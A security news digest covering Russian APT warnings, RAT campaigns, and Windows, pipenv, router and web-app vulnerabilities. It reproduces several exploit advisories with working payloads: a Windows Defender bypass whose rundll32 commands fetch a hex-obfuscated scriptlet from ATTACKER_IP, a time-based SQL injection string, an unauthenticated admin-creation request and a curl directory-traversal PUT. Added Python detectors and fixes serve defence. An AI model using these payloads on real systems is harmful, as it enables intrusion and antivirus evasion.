Saturday, January 18, 2025

FBI, NSA and CISA Warn of Russian Hackers Targeting Critical Infrastructure


Amid renewed tensions between the U.S. and Russia over Ukraine and Kazakhstan, American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.

To that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and exploiting known vulnerabilities to gain initial access to target networks.

The list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are “common but effective,” is below —

“Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,” the agencies said.

“The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments — including cloud environments — by using legitimate credentials.”

Russian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized SolarWinds Orion updates to breach the networks of U.S. government agencies.

To increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.

“Consider using a centralized patch management system,” the advisory reads. “For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.”

Other recommended best practices are as follows —

  • Implement robust log collection and retention
  • Require accounts to have strong passwords
  • Enable strong spam filters to prevent phishing emails from reaching end-users
  • Implement rigorous configuration management programs
  • Disable all unnecessary ports and protocols
  • Ensure OT hardware is in read-only mode


Hackers Use Cloud Services to Distribute Nanocore, Netwire, and AsyncRAT Malware


Threat actors are actively incorporating public cloud services from Amazon and Microsoft into their malicious campaigns to deliver commodity remote access trojans (RATs) such as Nanocore, Netwire, and AsyncRAT to siphon sensitive information from compromised systems.

The spear-phishing attacks, which commenced in October 2021, have primarily targeted entities located in the U.S., Canada, Italy, and Singapore, researchers from Cisco Talos said in a report shared with THN.

Using existing infrastructure to facilitate intrusions is increasingly becoming part of an attacker’s playbook: it removes the need to host their own servers and also serves as a cloaking mechanism that helps evade detection by security solutions.

In recent months, collaboration and communication tools like Discord, Slack, and Telegram have found a place in many an infection chain to commandeer and exfiltrate data from the victim machines. Viewed in that light, the abuse of cloud platforms is a tactical extension that attackers could exploit as a first step into a vast array of networks.

“There are several interesting aspects to this particular campaign, and it points to some of the things we commonly see used and abused by malicious actors,” Nick Biasini, head of outreach at Cisco Talos, told The Hacker News via email.

“From the use of cloud infrastructure to host malware to the abuse of dynamic DNS for command-and-control (C2) activities. Additionally, the layers of obfuscation point to the current state of criminal cyber activities, where it takes lots of analysis to get down to the final payload and intentions of the attack.”

As with many of these types of campaigns, it all starts with an invoice-themed phishing email containing a ZIP file attachment that, when opened, triggers an attack sequence that downloads next-stage payloads hosted on an Azure Cloud-based Windows server or an AWS EC2 instance, ultimately culminating in the deployment of different RATs, including AsyncRAT, Nanocore, and Netwire.

Also noteworthy is the use of DuckDNS, a free dynamic DNS service, to create malicious subdomains to deliver malware, with some of the actor-controlled malicious subdomains resolving to the download server on Azure Cloud while other servers are operated as C2 for the RAT payloads.

“Malicious actors are opportunistic and will always be looking for new and inventive ways to both host malware and infect victims,” Biasini said. “The abuse of platforms such as Slack and Discord as well as the related cloud abuse are part of this pattern. We also commonly find compromised websites being used to host malware and other infrastructure as well and again points to the fact that these adversaries will use any and all means to compromise victims.”


MS: New Critical Windows HTTP Vulnerability Is Wormable


Microsoft has patched a critical flaw tagged as wormable and found to impact the latest desktop and server Windows versions, including Windows 11 and Windows Server 2022.

The bug, tracked as CVE-2022-21907 and patched during this month’s Patch Tuesday, was discovered in the HTTP Protocol Stack (HTTP.sys) used as a protocol listener for processing HTTP requests by the Windows Internet Information Services (IIS) webserver.

Successful exploitation requires threat actors to send maliciously crafted packets to targeted Windows servers, which use the vulnerable HTTP Protocol Stack for processing packets.


Microsoft recommends users prioritize patching this flaw on all affected servers since it could allow unauthenticated attackers to remotely execute arbitrary code in low complexity attacks and “in most situations,” without requiring user interaction.

Mitigation available (for some Windows versions)

Luckily, the flaw is not currently under active exploitation and there are no publicly disclosed proof of concept exploits.

Furthermore, on some Windows versions (i.e., Windows Server 2019 and Windows 10 version 1809), the HTTP Trailer Support feature containing the bug is not enabled by default.

According to Microsoft, the following Windows registry key has to be configured on these two Windows versions to introduce the vulnerability: 

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters\ 

"EnableTrailerSupport"=dword:00000001

Disabling the HTTP Trailer Support feature will protect systems running the two versions, but this mitigation does not apply to other impacted Windows releases.

Potential targets likely safe from attacks

While home users have yet to apply today’s security updates, most companies will likely be protected from CVE-2022-21907 exploits, given that they don’t commonly run the latest released Windows versions.

In the last two years, Microsoft has patched several other wormable bugs, impacting the Windows DNS Server (also known as SIGRed), the Remote Desktop Services (RDS) platform (aka BlueKeep), and the Server Message Block v3 protocol (aka SMBGhost).

Redmond also addressed another Windows HTTP RCE vulnerability in May 2021 (tracked as CVE-2021-31166 and also tagged as wormable), for which security researchers released demo exploit code that could trigger blue screens of death.

However, threat actors have yet to exploit any of them to build wormable malware capable of spreading between unpatched Windows systems.


Microsoft Windows Defender – Detections Bypass


Advisory:

Exploit Title: Microsoft Windows Defender - Detections Bypass
Exploit Author: John Page (aka hyp3rlinx)
Website: hyp3rlinx.altervista[.]org
Source: http://hyp3rlinx.altervista[.]org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
twitter[.]com/hyp3rlinx
ISR: ApparitionSec

[Vendor]
www.microsoft[.]com


[Product]
Windows Defender

Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together
machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in
your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your
device and in the cloud.


[Vulnerability Type]
Windows Defender Detection Bypass
Trojan:Win32/Powessere.G - Backdoor:JS/Relvelshe.A


[CVE Reference]
N/A


[Security Issue]
Currently, Windows Defender detects and prevents Trojan:Win32/Powessere.G (aka "Poweliks") style execution that leverages rundll32.exe. Attempts at execution fail
and attackers get an "Access is denied" error message. However, the detection can be easily bypassed by adding an extra path-traversal element when referencing mshtml.

C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.

Pass an extra "..\" to the path.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)

Windows Defender also detects the following JScript call: GetObject("script:http://ATTACKER_IP/hi.tmp").
However, that detection can be bypassed by using string concatenation when constructing the URL scheme portion of the payload.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
Access is denied.

Full bypass E.g.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")

Enter the Backdoor:JS/Relvelshe.A detection.

Windows Defender also prevents execution of the downloaded code, detected as "Backdoor:JS/Relvelshe.A", and removes it once it lands in INetCache:
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"

However, this is easily bypassed by hex-encoding the payload code new ActiveXObject("WScript.Shell").Run("calc.exe").
The scriptlet then calls String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly and passes the result to JScript's built-in eval function.


[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427

Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426

[Exploit/PoC]
1) Remote JScript component "hi.tmp", hosted on a web server on port 80; it pops calc.exe using WScript.Shell and defeats the Backdoor:JS/Relvelshe.A detection.

python -m http.server 80

"hi.tmp"

<?xml version="1.0"?>
<component>
<script>
<![CDATA[
// hex encoding of: new ActiveXObject("WScript.Shell").Run("calc.exe")
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
// decode two hex digits at a time back into JScript source
for (var n = 0; n < hex.length; n += 2) {
    str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
// execute the decoded source; only the hex form is ever written to INetCache
eval(str);
]]>
</script>
</component>


2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")


BOOM!
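The following Python triage helper is an added example; it is not part of hyp3rlinx's advisory and does not reproduce Microsoft's detection logic. It does two things a defender would want after reading the advisory: it normalizes rundll32 process-creation command lines by collapsing the "\..\" hops before mshtml and the "script"+":" string concatenation shown above before matching the mshtml,RunHTMLApplication and GetObject("script: indicators, and it decodes long hex string literals in a fetched scriptlet such as hi.tmp to surface the hidden WScript.Shell call. The sample command lines are the advisory's own invocations plus one benign rundll32 call, constructed here for offline testing; ATTACKER_IP is the advisory's placeholder.

```python
import re

# Constructed samples for offline testing: the three rundll32 invocations shown in
# this advisory (ATTACKER_IP is the advisory's placeholder) plus one benign call.
SAMPLE_COMMAND_LINES = [
    r'rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)',
    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)',
    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();'
    r'GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")',
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
]

TRAVERSAL_RE = re.compile(r'(?:\\\.\.)+\\mshtml', re.I)   # \..\..\..\mshtml -> \mshtml
CONCAT_RE = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')     # "a"+"b"          -> "ab"
INDICATORS = {
    "mshtml_runhtmlapplication": re.compile(r'javascript:.*?mshtml\s*,\s*RunHTMLApplication', re.I),
    "scriptlet_moniker": re.compile(r'GetObject\s*\(\s*"script:', re.I),
}


def normalize(cmdline: str) -> str:
    """Undo the two obfuscations the advisory relies on, so that any number of
    path hops and any split of the "script:" literal collapse to one form."""
    s = TRAVERSAL_RE.sub(r'\\mshtml', cmdline)
    while True:
        collapsed = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', s)
        if collapsed == s:
            return s
        s = collapsed


def classify(cmdline: str) -> list:
    """Tags for one process-creation command line; an empty list means nothing of interest."""
    image = cmdline.split(None, 1)[0].lower().rsplit("\\", 1)[-1]
    if image != "rundll32.exe":
        return []
    tags = [name for name, rx in INDICATORS.items() if rx.search(normalize(cmdline))]
    if tags and TRAVERSAL_RE.search(cmdline):
        tags.append("mshtml_path_traversal")
    if tags and CONCAT_RE.search(cmdline):
        tags.append("string_concat")
    return tags


# A copy of the advisory's hi.tmp scriptlet, embedded here as test input.
SAMPLE_SCRIPTLET = """<?xml version="1.0"?>
<component>
<script>
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
</script>
</component>
"""

HEX_LITERAL_RE = re.compile(r'"([0-9A-Fa-f]{32,})"')
SUSPICIOUS_APIS = ("ActiveXObject", "WScript.Shell", ".Run(")


def decode_hex_literals(text: str) -> list:
    """Decode every long hex string literal in a scriptlet body."""
    return [bytes.fromhex(h).decode("latin-1")
            for h in HEX_LITERAL_RE.findall(text) if len(h) % 2 == 0]


def scriptlet_findings(text: str) -> list:
    """Flag runtime decode-and-eval plus any suspicious API hidden in hex literals."""
    findings = []
    if "String.fromCharCode" in text and "eval(" in text:
        findings.append("runtime_decode_and_eval")
    for decoded in decode_hex_literals(text):
        findings.extend("hex_hidden:" + api for api in SUSPICIOUS_APIS if api in decoded)
    return findings


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(classify(line) or "benign", "<-", line)
    print(scriptlet_findings(SAMPLE_SCRIPTLET))
```

Matching on the normalized form is the point: a rule that looks for the literal string "..\..\mshtml" or for GetObject("script: is exactly what the extra "..\" and the "script"+":" split defeat, whereas collapsing both first leaves the attacker nothing to vary.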


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
January 10, 2022 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


Arbitrary Command Injection Affecting pipenv


pipenv is a Python Development Workflow for Humans.

Affected package: pipenv, versions [2018.10.9, 2022.1.8)

How to fix?

Upgrade pipenv to version 2022.1.8 or higher.

Overview

Affected versions of this package are vulnerable to Arbitrary Command Injection. Due to a flaw in pipenv’s parsing of requirements files, an attacker can insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file (e.g. with pipenv install -r requirements.txt) to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims’ systems.

Source: Snyk

According to the requirements file format specification, any lines which begin with a # character, and/or any text in a line following whitespace and a # character should be interpreted as a comment which will be ignored during the processing of the requirements file.

However, due to a flaw in pipenv’s parsing of requirements files, an attacker can insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file (e.g. with pipenv install -r requirements.txt) to fetch dependencies from a package index server controlled by the attacker.

Note: The primary hurdle to exploiting this vulnerability is the attacker’s ability to surreptitiously insert the crafted string into a requirements.txt file that a victim will install. This is not a highly likely scenario; however, hiding the string inside a comment makes it easier to obfuscate.
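To make the parsing flaw concrete, here is an added Python example; it is not pipenv’s code, and the vulnerable function is a simplified stand-in for the bug class rather than pipenv’s actual parser. It contrasts scanning a raw line for --index-url/-i with first stripping comments according to the requirements file format: ‘#’ opens a comment only at the start of a line or after whitespace, so the #sha256= fragment of a direct URL must survive. The requirements text and the evil.example and files.example hostnames are constructed for the example.

```python
import re

# Constructed requirements.txt for this example (evil.example and files.example are
# placeholders). Only the second and third lines are real requirements; the index
# option appears in comments alone.
CONSTRUCTED_REQUIREMENTS = """\
# project deps  --index-url https://evil.example/simple/
requests==2.27.1    # pinned   -i https://evil.example/simple/
pkg @ https://files.example/pkg-1.0.zip#sha256=deadbeef
"""

INDEX_OPT_RE = re.compile(r"(?:^|\s)(?:--index-url|-i)[=\s]+(\S+)")
# Requirements file format: '#' opens a comment at line start or after whitespace.
COMMENT_RE = re.compile(r"(?:^|\s+)#.*$")


def find_index_naive(line: str):
    """Bug class behind the advisory: the option is scanned on the raw line, comments included."""
    m = INDEX_OPT_RE.search(line)
    return m.group(1) if m else None


def strip_comment(line: str) -> str:
    """Drop the comment while leaving '#sha256=' inside a direct URL untouched."""
    return COMMENT_RE.sub("", line).rstrip()


def find_index_safe(line: str):
    """Same option scan, but only over the part of the line that is not a comment."""
    return find_index_naive(strip_comment(line))


def parse_requirements(text: str, find_index):
    """Return (index_url, requirement_lines) as an installer using find_index would see them."""
    index_url, requirements = None, []
    for raw in text.splitlines():
        found = find_index(raw)
        if found:
            index_url = found          # last option wins, as with pip's own parser
        body = strip_comment(raw)
        if body and not body.startswith("-"):
            requirements.append(body)
    return index_url, requirements


if __name__ == "__main__":
    print("naive:", parse_requirements(CONSTRUCTED_REQUIREMENTS, find_index_naive))
    print("safe: ", parse_requirements(CONSTRUCTED_REQUIREMENTS, find_index_safe))
```

With the naive scan, both comment lines redirect every package fetch to the attacker’s index even though the file pins a single innocuous dependency; with comments stripped first, no index option is seen and the direct URL keeps its hash fragment.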


Online Railway Reservation System 1.0 – ‘id’ SQL Injection (Unauthenticated)

Exploit Title: Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated)
Exploit Author: twseptian
Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
Version: v1.0
Tested on: Kali Linux 2021.4, PHP 7.4.26

*SQL Injection*
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Railway Reservation System v1.0 is vulnerable to SQL injection via the 'id' parameter on the Reservation Form.

*Attack Vector*
An attacker can compromise the application's database using automated tools such as sqlmap, or manually.

*Steps to reproduce:*
Step-1: Navigate to 'Schedule' > go to the 'Book' or 'Reservation Form' page using the following URL:
http://localhost/orrs/?page=reserve&sid=1

Step-2: Put an SQL injection payload in the 'id' parameter (sent as sid in the URL).
Here a time-based blind payload is used: /orrs/?page=reserve&sid=1') AND (SELECT 6842 FROM (SELECT(SLEEP(5)))UsWr) AND ('WBCm'='WBCm

Step-3: The server accepts the payload and the response is delayed by 5 seconds, confirming the injection.
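As an added example (not part of twseptian's advisory and not the application's PHP code), the following Python reproduces the time-based blind check above against an in-memory SQLite database. The table name, the (id = '...') query shape that corresponds to sqlmap's ') prefix and AND ('WBCm'='WBCm suffix, and the registration of a SLEEP() function standing in for MySQL's are all assumptions. The delay is reduced to 0.3 s so it runs quickly; the parameterized query shows the fix.

```python
import sqlite3
import time

# sqlmap's time-based payload from Step-2, with the delay made a parameter.
PAYLOAD_TEMPLATE = "1') AND (SELECT 6842 FROM (SELECT(SLEEP(%s)))UsWr) AND ('WBCm'='WBCm"


def build_db():
    """In-memory stand-in for the app's database; table and column names are assumed.
    MySQL has SLEEP(); SQLite does not, so an equivalent user function is registered."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE schedules (id INTEGER PRIMARY KEY, train TEXT)")
    conn.execute("INSERT INTO schedules VALUES (1, 'Express 101')")
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn


def lookup_vulnerable(conn, sid: str):
    """String-built query: the ') in the payload closes the literal and the parenthesis,
    so the SLEEP() subquery becomes part of the WHERE clause."""
    sql = "SELECT id, train FROM schedules WHERE (id = '%s')" % sid
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, sid: str):
    """Bound parameter: the whole payload is compared as one value and matches nothing."""
    sql = "SELECT id, train FROM schedules WHERE (id = ?)"
    return conn.execute(sql, (sid,)).fetchall()


def timed(fn, *args):
    start = time.monotonic()
    rows = fn(*args)
    return rows, time.monotonic() - start


def time_based_blind_confirmed(lookup, conn, delay=0.3) -> bool:
    """Step-3 as a check: the sleep payload must take at least `delay` longer than baseline."""
    _, baseline = timed(lookup, conn, "1")
    _, slow = timed(lookup, conn, PAYLOAD_TEMPLATE % delay)
    return slow - baseline >= delay * 0.9


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", time_based_blind_confirmed(lookup_vulnerable, db))
    print("fixed:     ", time_based_blind_confirmed(lookup_fixed, db))
```

Comparing against a baseline request rather than an absolute threshold is what keeps the check usable over a real network, where latency alone can exceed a few hundred milliseconds.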

Online Railway Reservation System 1.0 – Admin Account Creation (Unauthenticated)

Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
Exploit Author: Zachary Asher
Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
Version: 1.0
Tested on: Online Railway Reservation System 1.0

=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602

-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"

1
            

CoreFTP Server build 725 – Directory Traversal (Authenticated)

Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
Exploit Author: LiamInfosec
Vendor Homepage: http://coreftp.com/
Version: build 725 and below
Tested on: Windows 10
CVE : CVE-2022-22836

# Description:

CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

# Proof of Concept:

curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
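An added example of the server-side check that the PoC above gets past; it is not CoreFTP's code, and the C:/CoreFTP/root path is hypothetical. The resolver decodes the request path once, treats backslashes like slashes because the server runs on Windows, and refuses any ".." that would climb above the root instead of silently normalising it. Note that this is the client-side half of why the PoC uses --path-as-is: without that flag curl squashes the ../ sequences before the request ever leaves the client.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical server root for the example; CoreFTP's real layout is not assumed.
SERVER_ROOT = "C:/CoreFTP/root"


def resolve_under_root(root: str, request_path: str):
    """Map the path of an HTTP request (e.g. PUT /path HTTP/1.1) to a file under root,
    or return None when it cannot be served safely.

    - percent-decoding happens exactly once; a double-encoded %252e stays a literal
      '%2e' segment and is never decoded a second time by this layer
    - backslashes count as separators because the server runs on Windows
    - '..' pops a segment only while still below root; climbing above root is an
      explicit rejection rather than a silent normalisation
    """
    path = unquote(request_path).replace("\\", "/")
    if "\x00" in path:
        return None
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                return None          # would escape the root
            segments.pop()
            continue
        if ":" in seg:               # drive letters and NTFS alternate data streams
            return None
        segments.append(seg)
    return posixpath.join(root, *segments)


if __name__ == "__main__":
    for p in ("/../../../../../../whoops", "/upload/report.txt", "/upload/%2e%2e/%2e%2e/x"):
        print(p, "->", resolve_under_root(SERVER_ROOT, p))
```

Rejecting rather than normalising matters for detection as much as for safety: a client that sends a raw ../ with an authenticated PUT is worth logging, and a resolver that quietly rewrites the path to /whoops under the root would hide that signal.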
            

US Police Warn of Parking Meters with Fake QR Codes


In a hurry to park your car?  Don’t want to fumble around in your pocket to find cash for the parking meter, and don’t have the correct payment app installed on your phone?

Well, think carefully before rushing to scan the payment QR code stuck on the side of the meter – it may well be an attempt by fraudsters to phish your financial information.

Police are warning that they have discovered bogus QR codes stuck onto public parking meters across Austin, Texas – a city where parking meters don’t display QR codes, and only accept payment via coins, cards or a smartphone app.

Twitter tweet from APD.

What happens if I scan the code?

The QR codes found by Austin police department directed unsuspecting users to a fraudulent website that would ask for payment details with the false promise that their parking session would be paid for.

The City of Austin checked its parking meters after being notified of a similar QR code scam by officials in San Antonio.  They had discovered over 100 parking meters similarly stickered in late December.

Lt Marcus Booth of San Antonio Police Department told reporters that the webpage pretended to accept payment for the parking session, but that money ended up in the hands of scammers rather than in the city’s coffers.

In short, it’s not just car drivers who are the victims of theft, but the city too.

It’s not known whether the attacks mounted against parking meters in the two cities are connected, or the work of copycats.  But clearly, it’s not a difficult scam for other groups to replicate in other American cities, or indeed elsewhere in the world.

As a consequence, you might be wiser paying for your parking meter with cash or via the appropriate smartphone app.

Authorities are encouraging anyone who believes that they might have been scammed by the fraudulent parking meter QR codes to file a police report and inform their payment card issuer immediately.

Meanwhile, if you see someone tampering with a parking meter, who is not a badged city employee, do the right thing and call the police.


New KCodes NetUSB Bug Affects Millions of Routers from Different Vendors


Cybersecurity researchers have detailed a high-severity flaw in the KCodes NetUSB component that is integrated into millions of end-user routers from Netgear, TP-Link, Tenda, EDiMAX, D-Link, and Western Digital, among others.

KCodes NetUSB is a Linux kernel module that enables devices on a local network to provide USB-based services over IP. Printers, external hard drives, and flash drives plugged into a Linux-based embedded system (e.g., a router) are made available via the network using the driver.

The flaw, tracked as CVE-2021-45608 (CVSS score: 9.8), is a buffer overflow that, if successfully exploited, allows attackers to execute code remotely in the kernel and perform malicious activities of their choice, according to a report SentinelOne shared with THN.

This is the latest in a string of NetUSB vulnerabilities that has been patched in recent years. In May 2015, researchers from SEC Consult disclosed another buffer overflow flaw (CVE-2015-3036) that could result in a denial-of-service (DoS) or code execution.


Then in June 2019, Cisco Talos divulged details of two weaknesses in NetUSB (CVE-2019-5016 and CVE-2019-5017) that could allow an attacker to inappropriately force select Netgear wireless routers into disclosing sensitive information and even giving the attacker the ability to remotely execute code.

Following responsible disclosure to KCodes on September 20, 2021, the Taiwanese company issued a patch to all vendors on November 19, after which Netgear released firmware updates containing fixes for the vulnerability.

SentinelOne has refrained from releasing proof-of-concept (PoC) code because other vendors are still in the process of shipping updates. But the firm cautioned that an exploit could still emerge in the wild despite the technical complexity involved, making it imperative that users apply the fixes to mitigate any potential risk.

“Since this vulnerability is within a third-party component licensed to various router vendors, the only way to fix this is to update the firmware of your router, if an update is available,” researcher Max Van Amerongen said. “It is important to check that your router is not an end-of-life model as it is unlikely to receive an update for this vulnerability.”
